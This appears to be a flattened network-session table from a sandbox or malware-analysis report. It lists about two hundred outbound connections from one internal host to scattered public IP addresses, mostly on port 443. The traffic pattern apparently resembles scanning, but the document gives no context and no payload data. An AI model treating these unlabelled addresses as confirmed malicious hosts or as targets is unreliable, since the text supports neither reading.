                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15642192.168.2.1459092203.196.203.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15643192.168.2.1460424139.158.69.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15644192.168.2.144389692.51.77.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15645192.168.2.1453882147.13.21.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15646192.168.2.1442554188.231.13.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15647192.168.2.1454550118.153.143.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15648192.168.2.145526220.245.229.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15649192.168.2.144465460.4.242.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15650192.168.2.14568564.126.114.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15651192.168.2.143376677.32.58.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15652192.168.2.1435404147.75.100.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15653192.168.2.143942862.11.131.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15654192.168.2.1456796197.224.147.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15655192.168.2.1444934105.56.132.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15656192.168.2.144202674.207.85.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15657192.168.2.1433578174.137.135.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15658192.168.2.145118019.49.175.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15659192.168.2.143507437.234.191.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15660192.168.2.1433330220.184.181.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15661192.168.2.1447654119.33.150.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15662192.168.2.143890239.123.223.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15663192.168.2.145164647.241.77.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15664192.168.2.144897443.158.94.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15665192.168.2.143514291.167.117.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15666192.168.2.145117620.219.195.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15667192.168.2.145739896.129.91.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15668192.168.2.1451836131.8.235.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15669192.168.2.144117651.71.38.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15670192.168.2.143567224.162.240.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15671192.168.2.144819281.221.153.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15672192.168.2.145627050.241.109.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15673192.168.2.1443154101.74.166.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15674192.168.2.1449902128.72.14.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15675192.168.2.1451474208.67.92.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15676192.168.2.1445100212.176.180.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15677192.168.2.1435078223.60.194.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15678192.168.2.1445102177.163.152.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15679192.168.2.1446888197.237.96.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15680192.168.2.1435522197.253.91.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15681192.168.2.145221445.40.90.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15682192.168.2.1453702210.152.66.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15683192.168.2.1436758152.87.144.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15684192.168.2.144742477.198.77.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15685192.168.2.1459002197.34.16.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15686192.168.2.1447736187.185.21.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15687192.168.2.1434046202.109.181.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15688192.168.2.144721686.165.218.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15689192.168.2.1434048156.232.174.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15690192.168.2.1456118172.142.184.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15691192.168.2.143305481.107.225.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15692192.168.2.14584844.146.106.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15693192.168.2.1458468216.119.242.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15694192.168.2.1445168118.11.34.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15695192.168.2.1441530180.206.202.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15696192.168.2.145927092.113.5.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15697192.168.2.1437558111.114.227.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15698192.168.2.1436444174.249.16.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15699192.168.2.144570447.148.157.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15700192.168.2.14330809.21.121.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15701192.168.2.1432784134.96.183.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15702192.168.2.1433672143.210.172.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15703192.168.2.1441692204.72.97.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15704192.168.2.143606092.209.219.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15705192.168.2.1443492181.26.42.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15706192.168.2.1433234203.146.24.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15707192.168.2.1452448140.177.82.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15708192.168.2.145277812.113.12.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15709192.168.2.1454246187.243.254.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15710192.168.2.1442698166.108.8.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15711192.168.2.1437152189.198.6.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15712192.168.2.145097259.120.252.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15713192.168.2.1433552177.171.34.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15714192.168.2.1446032203.183.75.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15715192.168.2.145006462.117.18.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15716192.168.2.144092473.59.39.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15717192.168.2.1448908154.25.173.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15718192.168.2.1459178199.189.83.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15719192.168.2.143316025.210.55.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15720192.168.2.1445794194.196.162.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15721192.168.2.1443972103.160.182.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15722192.168.2.1433612195.192.16.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15723192.168.2.1456318150.199.183.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15724192.168.2.14434882.29.135.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15725192.168.2.1453584205.244.194.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15726192.168.2.1446150144.26.51.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15727192.168.2.1433496150.248.209.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15728192.168.2.145311268.159.145.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15729192.168.2.145334820.68.126.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15730192.168.2.1439898171.159.116.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15731192.168.2.145412635.78.198.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15732192.168.2.1449186142.71.78.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15733192.168.2.1438896107.136.124.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15734192.168.2.1441464219.248.174.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15735192.168.2.1445916107.94.190.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15736192.168.2.143902266.140.147.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15737192.168.2.1443624126.46.194.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15738192.168.2.1433570113.199.194.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15739192.168.2.1451092133.10.63.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15740192.168.2.1455968159.194.213.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15741192.168.2.1450014125.34.9.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15742192.168.2.145648236.27.89.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15743192.168.2.1449910187.5.114.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15744192.168.2.1451020178.91.174.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15745192.168.2.1440152102.76.44.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15746192.168.2.14504502.199.107.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15747192.168.2.144782420.123.248.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15748192.168.2.1460258211.31.36.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15749192.168.2.144645080.87.163.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15750192.168.2.1453830118.46.10.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15751192.168.2.1457920117.125.36.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15752192.168.2.1456028118.21.185.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15753192.168.2.1452094132.173.37.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15754192.168.2.1440590222.254.0.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15755192.168.2.144699089.238.152.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15756192.168.2.1455058125.54.106.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15757192.168.2.1442582202.44.92.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15758192.168.2.143455076.39.123.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15759192.168.2.1453918144.249.98.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15760192.168.2.1452412200.139.71.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15761192.168.2.1445232142.12.68.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15762192.168.2.1447364217.23.219.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15763192.168.2.1438836203.238.219.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15764192.168.2.144174896.248.78.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15765192.168.2.1450254172.162.89.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15766192.168.2.1442772101.72.224.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15767192.168.2.14358242.150.156.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15768192.168.2.1453008152.165.98.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15769192.168.2.143721817.235.66.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15770192.168.2.1435736179.254.227.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15771192.168.2.145354875.42.47.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15772192.168.2.145129638.248.134.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15773192.168.2.1443188115.75.170.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15774192.168.2.1446492195.163.36.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15775192.168.2.1451156134.160.255.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15776192.168.2.144910850.38.237.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15777192.168.2.1445540155.87.25.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15778192.168.2.145395451.174.46.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15779192.168.2.1445200172.231.218.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15780192.168.2.144176691.163.37.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15781192.168.2.1441042197.40.245.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15782192.168.2.145954889.190.80.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15783192.168.2.1454522106.203.232.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15784192.168.2.1452104198.226.129.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15785192.168.2.145033038.176.200.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15786192.168.2.144542499.9.188.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15787192.168.2.143913887.46.99.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15788192.168.2.145786419.167.60.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15789192.168.2.1441594204.168.170.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15790192.168.2.1443466188.194.118.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15791192.168.2.143738054.224.16.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15792192.168.2.1437598189.200.56.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15793192.168.2.1436982223.108.79.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15794192.168.2.1457122205.15.25.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15795192.168.2.1444612183.124.12.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15796192.168.2.1448420132.88.161.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15797192.168.2.1449002186.159.43.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15798192.168.2.145251031.156.214.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15799192.168.2.1447468121.154.39.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15800192.168.2.1447460145.70.92.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15801192.168.2.1449132131.134.0.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15802192.168.2.143613668.53.39.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15803192.168.2.143502450.123.180.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15804192.168.2.1442714197.237.132.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15805192.168.2.1451426118.93.223.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15806192.168.2.143426696.55.207.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15807192.168.2.1435376105.68.231.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15808192.168.2.143573665.168.66.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15809192.168.2.1451920143.132.23.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15810192.168.2.1440490149.31.193.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15811192.168.2.1453038128.239.104.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15812192.168.2.144684470.88.190.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15813192.168.2.145150223.110.92.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15814192.168.2.1443094124.241.75.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15815192.168.2.1445016179.208.68.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15816192.168.2.1440832210.201.124.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15817192.168.2.1447050160.59.76.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15818192.168.2.145558250.105.202.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15819192.168.2.1442618140.176.253.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15820192.168.2.1444094151.3.34.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15821192.168.2.145706858.217.252.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15822192.168.2.1445516142.110.28.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15823192.168.2.1451126130.65.40.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15824192.168.2.1446060110.122.233.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15825192.168.2.1439284113.196.97.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15826192.168.2.1433912125.125.83.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15827192.168.2.1439050180.166.80.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15828192.168.2.145925243.197.212.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15829192.168.2.1447116179.164.231.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15830192.168.2.1435704173.174.8.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15831192.168.2.1436462199.125.165.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15832192.168.2.1436666191.138.138.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15833192.168.2.1455968212.200.149.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15834192.168.2.1451066106.201.139.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15835192.168.2.1435644120.215.120.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15836192.168.2.1443558155.58.244.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15837192.168.2.1434420140.87.79.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15838192.168.2.145115280.245.42.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15839192.168.2.1444022209.114.26.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15840192.168.2.143705034.13.104.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15841192.168.2.145080832.78.224.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15842192.168.2.145382476.20.8.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15843192.168.2.1433974121.229.232.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15844192.168.2.1442400187.64.125.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15845192.168.2.1449222218.18.182.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15846192.168.2.1459016108.82.237.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15847192.168.2.1433388129.150.158.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15848192.168.2.145731418.184.65.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15849192.168.2.1434204186.13.231.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15850192.168.2.1435404154.121.222.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15851192.168.2.1443262161.165.210.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15852192.168.2.144146465.30.117.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15853192.168.2.1442614174.6.23.128443
                                                        TimestampBytes transferredDirectionData


